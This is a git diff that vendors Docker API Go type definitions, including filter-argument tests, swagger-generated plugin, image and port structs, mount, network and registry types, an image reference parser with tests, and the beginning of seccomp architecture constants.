+		&Args{map[string]map[string]bool{
+			"created": map[string]bool{"to(.*)": true}},
+		}: "created",
+		&Args{map[string]map[string]bool{
+			"created": map[string]bool{"tod": true}},
+		}: "created",
+		&Args{map[string]map[string]bool{
+			"created": map[string]bool{"anyting": true, "to*": true}},
+		}: "created",
+	}
+
+	for args, field := range matches {
+		if args.Match(field, source) != true {
+			t.Fatalf("Expected true for %v on %v, got false", source, args)
+		}
+	}
+
+	differs := map[*Args]string{
+		&Args{map[string]map[string]bool{
+			"created": map[string]bool{"tomorrow": true}},
+		}: "created",
+		&Args{map[string]map[string]bool{
+			"created": map[string]bool{"to(day": true}},
+		}: "created",
+		&Args{map[string]map[string]bool{
+			"created": map[string]bool{"tom(.*)": true}},
+		}: "created",
+		&Args{map[string]map[string]bool{
+			"created": map[string]bool{"tom": true}},
+		}: "created",
+		&Args{map[string]map[string]bool{
+			"created": map[string]bool{"today1": true},
+			"labels":  map[string]bool{"today": true}},
+		}: "created",
+	}
+
+	for args, field := range differs {
+		if args.Match(field, source) != false {
+			t.Fatalf("Expected false for %v on %v, got true", source, args)
+		}
+	}
+}
+
+func TestAdd(t *testing.T) {
+	f := NewArgs()
+	f.Add("status", "running")
+	v := f.fields["status"]
+	if len(v) != 1 || !v["running"] {
+		t.Fatalf("Expected to include a running status, got %v", v)
+	}
+
+	f.Add("status", "paused")
+	if len(v) != 2 || !v["paused"] {
+		t.Fatalf("Expected to include a paused status, got %v", v)
+	}
+}
+
+func TestDel(t *testing.T) {
+	f := NewArgs()
+	f.Add("status", "running")
+	f.Del("status", "running")
+	v := f.fields["status"]
+	if v["running"] {
+		t.Fatalf("Expected to not include a running status filter, got true")
+	}
+}
+
+func TestLen(t *testing.T) {
+	f := NewArgs()
+	if f.Len() != 0 {
+		t.Fatalf("Expected to not include any field")
+	}
+	f.Add("status", "running")
+	if f.Len() != 1 {
+		t.Fatalf("Expected to include one field")
+	}
+}
+
+func TestExactMatch(t *testing.T) {
+	f := NewArgs()
+
+	if !f.ExactMatch("status", "running") {
+		t.Fatalf("Expected to match `running` when there are no filters, got false")
+	}
+
+	f.Add("status", "running")
+	f.Add("status", "pause*")
+
+	if !f.ExactMatch("status", "running") {
+		t.Fatalf("Expected to match `running` with one of the filters, got false")
+	}
+
+	if f.ExactMatch("status", "paused") {
+		t.Fatalf("Expected to not match `paused` with one of the filters, got true")
+	}
+}
+
+func TestOnlyOneExactMatch(t *testing.T) {
+	f := NewArgs()
+
+	if !f.UniqueExactMatch("status", "running") {
+		t.Fatalf("Expected to match `running` when there are no filters, got false")
+	}
+
+	f.Add("status", "running")
+
+	if !f.UniqueExactMatch("status", "running") {
+		t.Fatalf("Expected to match `running` with one of the filters, got false")
+	}
+
+	if f.UniqueExactMatch("status", "paused") {
+		t.Fatalf("Expected to not match `paused` with one of the filters, got true")
+	}
+
+	f.Add("status", "pause")
+	if f.UniqueExactMatch("status", "running") {
+		t.Fatalf("Expected to not match only `running` with two filters, got true")
+	}
+}
+
+func TestInclude(t *testing.T) {
+	f := NewArgs()
+	if f.Include("status") {
+		t.Fatalf("Expected to not include a status key, got true")
+	}
+	f.Add("status", "running")
+	if !f.Include("status") {
+		t.Fatalf("Expected to include a status key, got false")
+	}
+}
+
+func TestValidate(t *testing.T) {
+	f := NewArgs()
+	f.Add("status", "running")
+
+	valid := map[string]bool{
+		"status":   true,
+		"dangling": true,
+	}
+
+	if err := f.Validate(valid); err != nil {
+		t.Fatal(err)
+	}
+
+	f.Add("bogus", "running")
+	if err := f.Validate(valid); err == nil {
+		t.Fatalf("Expected to return an error, got nil")
+	}
+}
+
+func TestWalkValues(t *testing.T) {
+	f := NewArgs()
+	f.Add("status", "running")
+	f.Add("status", "paused")
+
+	f.WalkValues("status", func(value string) error {
+		if value != "running" && value != "paused" {
+			t.Fatalf("Unexpected value %s", value)
+		}
+		return nil
+	})
+
+	err := f.WalkValues("status", func(value string) error {
+		return fmt.Errorf("return")
+	})
+	if err == nil {
+		t.Fatalf("Expected to get an error, got nil")
+	}
+
+	err = f.WalkValues("foo", func(value string) error {
+		return fmt.Errorf("return")
+	})
+	if err != nil {
+		t.Fatalf("Expected to not iterate when the field doesn't exist, got %v", err)
+	}
+}
+
+func TestFuzzyMatch(t *testing.T) {
+	f := NewArgs()
+	f.Add("container", "foo")
+
+	cases := map[string]bool{
+		"foo":    true,
+		"foobar": true,
+		"barfoo": false,
+		"bar":    false,
+	}
+	for source, match := range cases {
+		got := f.FuzzyMatch("container", source)
+		if got != match {
+			t.Fatalf("Expected %v, got %v: %s", match, got, source)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/types/id_response.go b/vendor/github.com/docker/docker/api/types/id_response.go
new file mode 100644
index 0000000000..7592d2f8b1
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/id_response.go
@@ -0,0 +1,13 @@
+package types
+
+// This file was generated by the swagger tool.
+// Editing this file might prove futile when you re-run the swagger generate command
+
+// IDResponse Response to an API call that returns just an Id
+// swagger:model IdResponse
+type IDResponse struct {
+
+	// The id of the newly created object.
+	// Required: true
+	ID string `json:"Id"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/image_summary.go b/vendor/github.com/docker/docker/api/types/image_summary.go
new file mode 100644
index 0000000000..e145b3dcfc
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/image_summary.go
@@ -0,0 +1,49 @@
+package types
+
+// This file was generated by the swagger tool.
+// Editing this file might prove futile when you re-run the swagger generate command
+
+// ImageSummary image summary
+// swagger:model ImageSummary
+type ImageSummary struct {
+
+	// containers
+	// Required: true
+	Containers int64 `json:"Containers"`
+
+	// created
+	// Required: true
+	Created int64 `json:"Created"`
+
+	// Id
+	// Required: true
+	ID string `json:"Id"`
+
+	// labels
+	// Required: true
+	Labels map[string]string `json:"Labels"`
+
+	// parent Id
+	// Required: true
+	ParentID string `json:"ParentId"`
+
+	// repo digests
+	// Required: true
+	RepoDigests []string `json:"RepoDigests"`
+
+	// repo tags
+	// Required: true
+	RepoTags []string `json:"RepoTags"`
+
+	// shared size
+	// Required: true
+	SharedSize int64 `json:"SharedSize"`
+
+	// size
+	// Required: true
+	Size int64 `json:"Size"`
+
+	// virtual size
+	// Required: true
+	VirtualSize int64 `json:"VirtualSize"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/mount/mount.go b/vendor/github.com/docker/docker/api/types/mount/mount.go
new file mode 100644
index 0000000000..31f2365b8e
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/mount/mount.go
@@ -0,0 +1,113 @@
+package mount
+
+import (
+	"os"
+)
+
+// Type represents the type of a mount.
+type Type string
+
+// Type constants
+const (
+	// TypeBind is the type for mounting host dir
+	TypeBind Type = "bind"
+	// TypeVolume is the type for remote storage volumes
+	TypeVolume Type = "volume"
+	// TypeTmpfs is the type for mounting tmpfs
+	TypeTmpfs Type = "tmpfs"
+)
+
+// Mount represents a mount (volume).
+type Mount struct {
+	Type Type `json:",omitempty"`
+	// Source specifies the name of the mount. Depending on mount type, this
+	// may be a volume name or a host path, or even ignored.
+	// Source is not supported for tmpfs (must be an empty value)
+	Source   string `json:",omitempty"`
+	Target   string `json:",omitempty"`
+	ReadOnly bool   `json:",omitempty"`
+
+	BindOptions   *BindOptions   `json:",omitempty"`
+	VolumeOptions *VolumeOptions `json:",omitempty"`
+	TmpfsOptions  *TmpfsOptions  `json:",omitempty"`
+}
+
+// Propagation represents the propagation of a mount.
+type Propagation string
+
+const (
+	// PropagationRPrivate RPRIVATE
+	PropagationRPrivate Propagation = "rprivate"
+	// PropagationPrivate PRIVATE
+	PropagationPrivate Propagation = "private"
+	// PropagationRShared RSHARED
+	PropagationRShared Propagation = "rshared"
+	// PropagationShared SHARED
+	PropagationShared Propagation = "shared"
+	// PropagationRSlave RSLAVE
+	PropagationRSlave Propagation = "rslave"
+	// PropagationSlave SLAVE
+	PropagationSlave Propagation = "slave"
+)
+
+// Propagations is the list of all valid mount propagations
+var Propagations = []Propagation{
+	PropagationRPrivate,
+	PropagationPrivate,
+	PropagationRShared,
+	PropagationShared,
+	PropagationRSlave,
+	PropagationSlave,
+}
+
+// BindOptions defines options specific to mounts of type "bind".
+type BindOptions struct {
+	Propagation Propagation `json:",omitempty"`
+}
+
+// VolumeOptions represents the options for a mount of type volume.
+type VolumeOptions struct {
+	NoCopy       bool              `json:",omitempty"`
+	Labels       map[string]string `json:",omitempty"`
+	DriverConfig *Driver           `json:",omitempty"`
+}
+
+// Driver represents a volume driver.
+type Driver struct {
+	Name    string            `json:",omitempty"`
+	Options map[string]string `json:",omitempty"`
+}
+
+// TmpfsOptions defines options specific to mounts of type "tmpfs".
+type TmpfsOptions struct {
+	// Size sets the size of the tmpfs, in bytes.
+	//
+	// This will be converted to an operating system specific value
+	// depending on the host. For example, on linux, it will be convered to
+	// use a 'k', 'm' or 'g' syntax. BSD, though not widely supported with
+	// docker, uses a straight byte value.
+	//
+	// Percentages are not supported.
+	SizeBytes int64 `json:",omitempty"`
+	// Mode of the tmpfs upon creation
+	Mode os.FileMode `json:",omitempty"`
+
+	// TODO(stevvooe): There are several more tmpfs flags, specified in the
+	// daemon, that are accepted. Only the most basic are added for now.
+	//
+	// From docker/docker/pkg/mount/flags.go:
+	//
+	// var validFlags = map[string]bool{
+	// 	"":          true,
+	// 	"size":      true, X
+	// 	"mode":      true, X
+	// 	"uid":       true,
+	// 	"gid":       true,
+	// 	"nr_inodes": true,
+	// 	"nr_blocks": true,
+	// 	"mpol":      true,
+	// }
+	//
+	// Some of these may be straightforward to add, but others, such as
+	// uid/gid have implications in a clustered system.
+}
diff --git a/vendor/github.com/docker/docker/api/types/network/network.go b/vendor/github.com/docker/docker/api/types/network/network.go
new file mode 100644
index 0000000000..832b3edb9f
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/network/network.go
@@ -0,0 +1,59 @@
+package network
+
+// Address represents an IP address
+type Address struct {
+	Addr      string
+	PrefixLen int
+}
+
+// IPAM represents IP Address Management
+type IPAM struct {
+	Driver  string
+	Options map[string]string //Per network IPAM driver options
+	Config  []IPAMConfig
+}
+
+// IPAMConfig represents IPAM configurations
+type IPAMConfig struct {
+	Subnet     string            `json:",omitempty"`
+	IPRange    string            `json:",omitempty"`
+	Gateway    string            `json:",omitempty"`
+	AuxAddress map[string]string `json:"AuxiliaryAddresses,omitempty"`
+}
+
+// EndpointIPAMConfig represents IPAM configurations for the endpoint
+type EndpointIPAMConfig struct {
+	IPv4Address  string   `json:",omitempty"`
+	IPv6Address  string   `json:",omitempty"`
+	LinkLocalIPs []string `json:",omitempty"`
+}
+
+// PeerInfo represents one peer of a overlay network
+type PeerInfo struct {
+	Name string
+	IP   string
+}
+
+// EndpointSettings stores the network endpoint details
+type EndpointSettings struct {
+	// Configurations
+	IPAMConfig *EndpointIPAMConfig
+	Links      []string
+	Aliases    []string
+	// Operational data
+	NetworkID           string
+	EndpointID          string
+	Gateway             string
+	IPAddress           string
+	IPPrefixLen         int
+	IPv6Gateway         string
+	GlobalIPv6Address   string
+	GlobalIPv6PrefixLen int
+	MacAddress          string
+}
+
+// NetworkingConfig represents the container's networking configuration for each of its interfaces
+// Carries the networking configs specified in the `docker run` and `docker network connect` commands
+type NetworkingConfig struct {
+	EndpointsConfig map[string]*EndpointSettings // Endpoint configs for each connecting network
+}
diff --git a/vendor/github.com/docker/docker/api/types/plugin.go b/vendor/github.com/docker/docker/api/types/plugin.go
new file mode 100644
index 0000000000..6cc7a23b02
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/plugin.go
@@ -0,0 +1,189 @@
+package types
+
+// This file was generated by the swagger tool.
+// Editing this file might prove futile when you re-run the swagger generate command
+
+// Plugin A plugin for the Engine API
+// swagger:model Plugin
+type Plugin struct {
+
+	// config
+	// Required: true
+	Config PluginConfig `json:"Config"`
+
+	// True when the plugin is running. False when the plugin is not running, only installed.
+	// Required: true
+	Enabled bool `json:"Enabled"`
+
+	// Id
+	ID string `json:"Id,omitempty"`
+
+	// name
+	// Required: true
+	Name string `json:"Name"`
+
+	// plugin remote reference used to push/pull the plugin
+	PluginReference string `json:"PluginReference,omitempty"`
+
+	// settings
+	// Required: true
+	Settings PluginSettings `json:"Settings"`
+}
+
+// PluginConfig The config of a plugin.
+// swagger:model PluginConfig
+type PluginConfig struct {
+
+	// args
+	// Required: true
+	Args PluginConfigArgs `json:"Args"`
+
+	// description
+	// Required: true
+	Description string `json:"Description"`
+
+	// documentation
+	// Required: true
+	Documentation string `json:"Documentation"`
+
+	// entrypoint
+	// Required: true
+	Entrypoint []string `json:"Entrypoint"`
+
+	// env
+	// Required: true
+	Env []PluginEnv `json:"Env"`
+
+	// interface
+	// Required: true
+	Interface PluginConfigInterface `json:"Interface"`
+
+	// linux
+	// Required: true
+	Linux PluginConfigLinux `json:"Linux"`
+
+	// mounts
+	// Required: true
+	Mounts []PluginMount `json:"Mounts"`
+
+	// network
+	// Required: true
+	Network PluginConfigNetwork `json:"Network"`
+
+	// propagated mount
+	// Required: true
+	PropagatedMount string `json:"PropagatedMount"`
+
+	// user
+	User PluginConfigUser `json:"User,omitempty"`
+
+	// work dir
+	// Required: true
+	WorkDir string `json:"WorkDir"`
+
+	// rootfs
+	Rootfs *PluginConfigRootfs `json:"rootfs,omitempty"`
+}
+
+// PluginConfigArgs plugin config args
+// swagger:model PluginConfigArgs
+type PluginConfigArgs struct {
+
+	// description
+	// Required: true
+	Description string `json:"Description"`
+
+	// name
+	// Required: true
+	Name string `json:"Name"`
+
+	// settable
+	// Required: true
+	Settable []string `json:"Settable"`
+
+	// value
+	// Required: true
+	Value []string `json:"Value"`
+}
+
+// PluginConfigInterface The interface between Docker and the plugin
+// swagger:model PluginConfigInterface
+type PluginConfigInterface struct {
+
+	// socket
+	// Required: true
+	Socket string `json:"Socket"`
+
+	// types
+	// Required: true
+	Types []PluginInterfaceType `json:"Types"`
+}
+
+// PluginConfigLinux plugin config linux
+// swagger:model PluginConfigLinux
+type PluginConfigLinux struct {
+
+	// allow all devices
+	// Required: true
+	AllowAllDevices bool `json:"AllowAllDevices"`
+
+	// capabilities
+	// Required: true
+	Capabilities []string `json:"Capabilities"`
+
+	// devices
+	// Required: true
+	Devices []PluginDevice `json:"Devices"`
+}
+
+// PluginConfigNetwork plugin config network
+// swagger:model PluginConfigNetwork
+type PluginConfigNetwork struct {
+
+	// type
+	// Required: true
+	Type string `json:"Type"`
+}
+
+// PluginConfigRootfs plugin config rootfs
+// swagger:model PluginConfigRootfs
+type PluginConfigRootfs struct {
+
+	// diff ids
+	DiffIds []string `json:"diff_ids"`
+
+	// type
+	Type string `json:"type,omitempty"`
+}
+
+// PluginConfigUser plugin config user
+// swagger:model PluginConfigUser
+type PluginConfigUser struct {
+
+	// g ID
+	GID uint32 `json:"GID,omitempty"`
+
+	// UID
+	UID uint32 `json:"UID,omitempty"`
+}
+
+// PluginSettings Settings that can be modified by users.
+// swagger:model PluginSettings
+type PluginSettings struct {
+
+	// args
+	// Required: true
+	Args []string `json:"Args"`
+
+	// devices
+	// Required: true
+	Devices []PluginDevice `json:"Devices"`
+
+	// env
+	// Required: true
+	Env []string `json:"Env"`
+
+	// mounts
+	// Required: true
+	Mounts []PluginMount `json:"Mounts"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/plugin_device.go b/vendor/github.com/docker/docker/api/types/plugin_device.go
new file mode 100644
index 0000000000..5699010675
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/plugin_device.go
@@ -0,0 +1,25 @@
+package types
+
+// This file was generated by the swagger tool.
+// Editing this file might prove futile when you re-run the swagger generate command
+
+// PluginDevice plugin device
+// swagger:model PluginDevice
+type PluginDevice struct {
+
+	// description
+	// Required: true
+	Description string `json:"Description"`
+
+	// name
+	// Required: true
+	Name string `json:"Name"`
+
+	// path
+	// Required: true
+	Path *string `json:"Path"`
+
+	// settable
+	// Required: true
+	Settable []string `json:"Settable"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/plugin_env.go b/vendor/github.com/docker/docker/api/types/plugin_env.go
new file mode 100644
index 0000000000..32962dc2eb
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/plugin_env.go
@@ -0,0 +1,25 @@
+package types
+
+// This file was generated by the swagger tool.
+// Editing this file might prove futile when you re-run the swagger generate command
+
+// PluginEnv plugin env
+// swagger:model PluginEnv
+type PluginEnv struct {
+
+	// description
+	// Required: true
+	Description string `json:"Description"`
+
+	// name
+	// Required: true
+	Name string `json:"Name"`
+
+	// settable
+	// Required: true
+	Settable []string `json:"Settable"`
+
+	// value
+	// Required: true
+	Value *string `json:"Value"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/plugin_interface_type.go b/vendor/github.com/docker/docker/api/types/plugin_interface_type.go
new file mode 100644
index 0000000000..c82f204e87
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/plugin_interface_type.go
@@ -0,0 +1,21 @@
+package types
+
+// This file was generated by the swagger tool.
+// Editing this file might prove futile when you re-run the swagger generate command
+
+// PluginInterfaceType plugin interface type
+// swagger:model PluginInterfaceType
+type PluginInterfaceType struct {
+
+	// capability
+	// Required: true
+	Capability string `json:"Capability"`
+
+	// prefix
+	// Required: true
+	Prefix string `json:"Prefix"`
+
+	// version
+	// Required: true
+	Version string `json:"Version"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/plugin_mount.go b/vendor/github.com/docker/docker/api/types/plugin_mount.go
new file mode 100644
index 0000000000..5c031cf8b5
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/plugin_mount.go
@@ -0,0 +1,37 @@
+package types
+
+// This file was generated by the swagger tool.
+// Editing this file might prove futile when you re-run the swagger generate command
+
+// PluginMount plugin mount
+// swagger:model PluginMount
+type PluginMount struct {
+
+	// description
+	// Required: true
+	Description string `json:"Description"`
+
+	// destination
+	// Required: true
+	Destination string `json:"Destination"`
+
+	// name
+	// Required: true
+	Name string `json:"Name"`
+
+	// options
+	// Required: true
+	Options []string `json:"Options"`
+
+	// settable
+	// Required: true
+	Settable []string `json:"Settable"`
+
+	// source
+	// Required: true
+	Source *string `json:"Source"`
+
+	// type
+	// Required: true
+	Type string `json:"Type"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/plugin_responses.go b/vendor/github.com/docker/docker/api/types/plugin_responses.go
new file mode 100644
index 0000000000..d6f7553119
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/plugin_responses.go
@@ -0,0 +1,64 @@
+package types
+
+import (
+	"encoding/json"
+	"fmt"
+)
+
+// PluginsListResponse contains the response for the Engine API
+type PluginsListResponse []*Plugin
+
+const (
+	authzDriver   = "AuthzDriver"
+	graphDriver   = "GraphDriver"
+	ipamDriver    = "IpamDriver"
+	networkDriver = "NetworkDriver"
+	volumeDriver  = "VolumeDriver"
+)
+
+// UnmarshalJSON implements json.Unmarshaler for PluginInterfaceType
+func (t *PluginInterfaceType) UnmarshalJSON(p []byte) error {
+	versionIndex := len(p)
+	prefixIndex := 0
+	if len(p) < 2 || p[0] != '"' || p[len(p)-1] != '"' {
+		return fmt.Errorf("%q is not a plugin interface type", p)
+	}
+	p = p[1 : len(p)-1]
+loop:
+	for i, b := range p {
+		switch b {
+		case '.':
+			prefixIndex = i
+		case '/':
+			versionIndex = i
+			break loop
+		}
+	}
+	t.Prefix = string(p[:prefixIndex])
+	t.Capability = string(p[prefixIndex+1 : versionIndex])
+	if versionIndex < len(p) {
+		t.Version = string(p[versionIndex+1:])
+	}
+	return nil
+}
+
+// MarshalJSON implements json.Marshaler for PluginInterfaceType
+func (t *PluginInterfaceType) MarshalJSON() ([]byte, error) {
+	return json.Marshal(t.String())
+}
+
+// String implements fmt.Stringer for PluginInterfaceType
+func (t PluginInterfaceType) String() string {
+	return fmt.Sprintf("%s.%s/%s", t.Prefix, t.Capability, t.Version)
+}
+
+// PluginPrivilege describes a permission the user has to accept
+// upon installing a plugin.
+type PluginPrivilege struct {
+	Name        string
+	Description string
+	Value       []string
+}
+
+// PluginPrivileges is a list of PluginPrivilege
+type PluginPrivileges []PluginPrivilege
diff --git a/vendor/github.com/docker/docker/api/types/port.go b/vendor/github.com/docker/docker/api/types/port.go
new file mode 100644
index 0000000000..ad52d46d56
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/port.go
@@ -0,0 +1,23 @@
+package types
+
+// This file was generated by the swagger tool.
+// Editing this file might prove futile when you re-run the swagger generate command
+
+// Port An open port on a container
+// swagger:model Port
+type Port struct {
+
+	// IP
+	IP string `json:"IP,omitempty"`
+
+	// Port on the container
+	// Required: true
+	PrivatePort uint16 `json:"PrivatePort"`
+
+	// Port exposed on the host
+	PublicPort uint16 `json:"PublicPort,omitempty"`
+
+	// type
+	// Required: true
+	Type string `json:"Type"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/reference/image_reference.go b/vendor/github.com/docker/docker/api/types/reference/image_reference.go
new file mode 100644
index 0000000000..be9cf8ebed
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/reference/image_reference.go
@@ -0,0 +1,34 @@
+package reference
+
+import (
+	distreference "github.com/docker/distribution/reference"
+)
+
+// Parse parses the given references and returns the repository and
+// tag (if present) from it. If there is an error during parsing, it will
+// return an error.
+func Parse(ref string) (string, string, error) {
+	distributionRef, err := distreference.ParseNamed(ref)
+	if err != nil {
+		return "", "", err
+	}
+
+	tag := GetTagFromNamedRef(distributionRef)
+	return distributionRef.Name(), tag, nil
+}
+
+// GetTagFromNamedRef returns a tag from the specified reference.
+// This function is necessary as long as the docker "server" api makes the distinction between repository
+// and tags.
+func GetTagFromNamedRef(ref distreference.Named) string {
+	var tag string
+	switch x := ref.(type) {
+	case distreference.Digested:
+		tag = x.Digest().String()
+	case distreference.NamedTagged:
+		tag = x.Tag()
+	default:
+		tag = "latest"
+	}
+	return tag
+}
diff --git a/vendor/github.com/docker/docker/api/types/reference/image_reference_test.go b/vendor/github.com/docker/docker/api/types/reference/image_reference_test.go
new file mode 100644
index 0000000000..61fb676b6c
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/reference/image_reference_test.go
@@ -0,0 +1,72 @@
+package reference
+
+import (
+	"testing"
+)
+
+func TestParse(t *testing.T) {
+	testCases := []struct {
+		ref           string
+		expectedName  string
+		expectedTag   string
+		expectedError bool
+	}{
+		{
+			ref:           "",
+			expectedName:  "",
+			expectedTag:   "",
+			expectedError: true,
+		},
+		{
+			ref:           "repository",
+			expectedName:  "repository",
+			expectedTag:   "latest",
+			expectedError: false,
+		},
+		{
+			ref:           "repository:tag",
+			expectedName:  "repository",
+			expectedTag:   "tag",
+			expectedError: false,
+		},
+		{
+			ref:           "test.com/repository",
+			expectedName:  "test.com/repository",
+			expectedTag:   "latest",
+			expectedError: false,
+		},
+		{
+			ref:           "test.com:5000/test/repository",
+			expectedName:  "test.com:5000/test/repository",
+			expectedTag:   "latest",
+			expectedError: false,
+		},
+		{
+			ref:           "test.com:5000/repo@sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff",
+			expectedName:  "test.com:5000/repo",
+			expectedTag:   "sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff",
+			expectedError: false,
+		},
+		{
+			ref:           "test.com:5000/repo:tag@sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff",
+			expectedName:  "test.com:5000/repo",
+			expectedTag:   "sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff",
+			expectedError: false,
+		},
+	}
+
+	for _, c := range testCases {
+		name, tag, err := Parse(c.ref)
+		if err != nil && c.expectedError {
+			continue
+		} else if err != nil {
+			t.Fatalf("error with %s: %s", c.ref, err.Error())
+		}
+		if name != c.expectedName {
+			t.Fatalf("expected name %s, got %s", c.expectedName, name)
+		}
+		if tag != c.expectedTag {
+			t.Fatalf("expected tag %s, got %s", c.expectedTag, tag)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/types/registry/authenticate.go b/vendor/github.com/docker/docker/api/types/registry/authenticate.go
new file mode 100644
index 0000000000..5e37d19bd4
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/registry/authenticate.go
@@ -0,0 +1,21 @@
+package registry
+
+// ----------------------------------------------------------------------------
+// DO NOT EDIT THIS FILE
+// This file was generated by `swagger generate operation`
+//
+// See hack/swagger-gen.sh
+// ----------------------------------------------------------------------------
+
+// AuthenticateOKBody authenticate o k body
+// swagger:model AuthenticateOKBody
+type AuthenticateOKBody struct {
+
+	// An opaque token used to authenticate a user after a successful login
+	// Required: true
+	IdentityToken string `json:"IdentityToken"`
+
+	// The status of the authentication
+	// Required: true
+	Status string `json:"Status"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/registry/registry.go b/vendor/github.com/docker/docker/api/types/registry/registry.go
new file mode 100644
index 0000000000..28fafab901
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/registry/registry.go
@@ -0,0 +1,104 @@
+package registry
+
+import (
+	"encoding/json"
+	"net"
+)
+
+// ServiceConfig stores daemon registry services configuration.
+type ServiceConfig struct {
+	InsecureRegistryCIDRs []*NetIPNet           `json:"InsecureRegistryCIDRs"`
+	IndexConfigs          map[string]*IndexInfo `json:"IndexConfigs"`
+	Mirrors               []string
+}
+
+// NetIPNet is the net.IPNet type, which can be marshalled and
+// unmarshalled to JSON
+type NetIPNet net.IPNet
+
+// String returns the CIDR notation of ipnet
+func (ipnet *NetIPNet) String() string {
+	return (*net.IPNet)(ipnet).String()
+}
+
+// MarshalJSON returns the JSON representation of the IPNet
+func (ipnet *NetIPNet) MarshalJSON() ([]byte, error) {
+	return json.Marshal((*net.IPNet)(ipnet).String())
+}
+
+// UnmarshalJSON sets the IPNet from a byte array of JSON
+func (ipnet *NetIPNet) UnmarshalJSON(b []byte) (err error) {
+	var ipnetStr string
+	if err = json.Unmarshal(b, &ipnetStr); err == nil {
+		var cidr *net.IPNet
+		if _, cidr, err = net.ParseCIDR(ipnetStr); err == nil {
+			*ipnet = NetIPNet(*cidr)
+		}
+	}
+	return
+}
+
+// IndexInfo contains information about a registry
+//
+// RepositoryInfo Examples:
+// {
+//   "Index" : {
+//     "Name" : "docker.io",
+//     "Mirrors" : ["https://registry-2.docker.io/v1/", "https://registry-3.docker.io/v1/"],
+//     "Secure" : true,
+//     "Official" : true,
+//   },
+//   "RemoteName" : "library/debian",
+//   "LocalName" : "debian",
+//   "CanonicalName" : "docker.io/debian"
+//   "Official" : true,
+// }
+//
+// {
+//   "Index" : {
+//     "Name" : "127.0.0.1:5000",
+//     "Mirrors" : [],
+//     "Secure" : false,
+//     "Official" : false,
+//   },
+//   "RemoteName" : "user/repo",
+//   "LocalName" : "127.0.0.1:5000/user/repo",
+//   "CanonicalName" : "127.0.0.1:5000/user/repo",
+//   "Official" : false,
+// }
+type IndexInfo struct {
+	// Name is the name of the registry, such as "docker.io"
+	Name string
+	// Mirrors is a list of mirrors, expressed as URIs
+	Mirrors []string
+	// Secure is set to false if the registry is part of the list of
+	// insecure registries. Insecure registries accept HTTP and/or accept
+	// HTTPS with certificates from unknown CAs.
+	Secure bool
+	// Official indicates whether this is an official registry
+	Official bool
+}
+
+// SearchResult describes a search result returned from a registry
+type SearchResult struct {
+	// StarCount indicates the number of stars this repository has
+	StarCount int `json:"star_count"`
+	// IsOfficial is true if the result is from an official repository.
+	IsOfficial bool `json:"is_official"`
+	// Name is the name of the repository
+	Name string `json:"name"`
+	// IsAutomated indicates whether the result is automated
+	IsAutomated bool `json:"is_automated"`
+	// Description is a textual description of the repository
+	Description string `json:"description"`
+}
+
+// SearchResults lists a collection search results returned from a registry
+type SearchResults struct {
+	// Query contains the query string that generated the search results
+	Query string `json:"query"`
+	// NumResults indicates the number of results the query returned
+	NumResults int `json:"num_results"`
+	// Results is a slice containing the actual results for the search
+	Results []SearchResult `json:"results"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/seccomp.go b/vendor/github.com/docker/docker/api/types/seccomp.go
new file mode 100644
index 0000000000..4f02ef36b8
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/seccomp.go
@@ -0,0 +1,93 @@
+package types
+
+// Seccomp represents the config for a seccomp profile for syscall restriction.
+type Seccomp struct {
+	DefaultAction Action `json:"defaultAction"`
+	// Architectures is kept to maintain backward compatibility with the old
+	// seccomp profile.
+	Architectures []Arch         `json:"architectures,omitempty"`
+	ArchMap       []Architecture `json:"archMap,omitempty"`
+	Syscalls      []*Syscall     `json:"syscalls"`
+}
+
+// Architecture is used to represent an specific architecture
+// and its sub-architectures
+type Architecture struct {
+	Arch      Arch   `json:"architecture"`
+	SubArches []Arch `json:"subArchitectures"`
+}
+
+// Arch used for architectures
+type Arch string
+
+// Additional architectures permitted to be used for system calls
+// By default only the native architecture of the kernel is permitted
+const (
+	ArchX86         Arch = "SCMP_ARCH_X86"
+	ArchX86_64      Arch = "SCMP_ARCH_X86_64"
+	ArchX32         Arch = "SCMP_ARCH_X32"
+	ArchARM         Arch = "SCMP_ARCH_ARM"
+	ArchAARCH64     Arch = "SCMP_ARCH_AARCH64"
+	ArchMIPS        Arch = "SCMP_ARCH_MIPS"
+	ArchMIPS64      Arch = "SCMP_ARCH_MIPS64"
+	ArchMIPS64N32   Arch = "SCMP_ARCH_MIPS64N32"
+	ArchMIPSEL      Arch = "SCMP_ARCH_MIPSEL"
+	ArchMIPSEL64    Arch = "SCMP_ARCH_MIPSEL64"
+	ArchMIPSEL64N32 Arch = "SCMP_ARCH_MIPSEL64N32"
+	ArchPPC         Arch = "SCMP_ARCH_PPC"
+	ArchPPC64       Arch = "SCMP_ARCH_PPC64"
+	ArchPPC64LE     Arch = "SCMP_ARCH_PPC64LE"
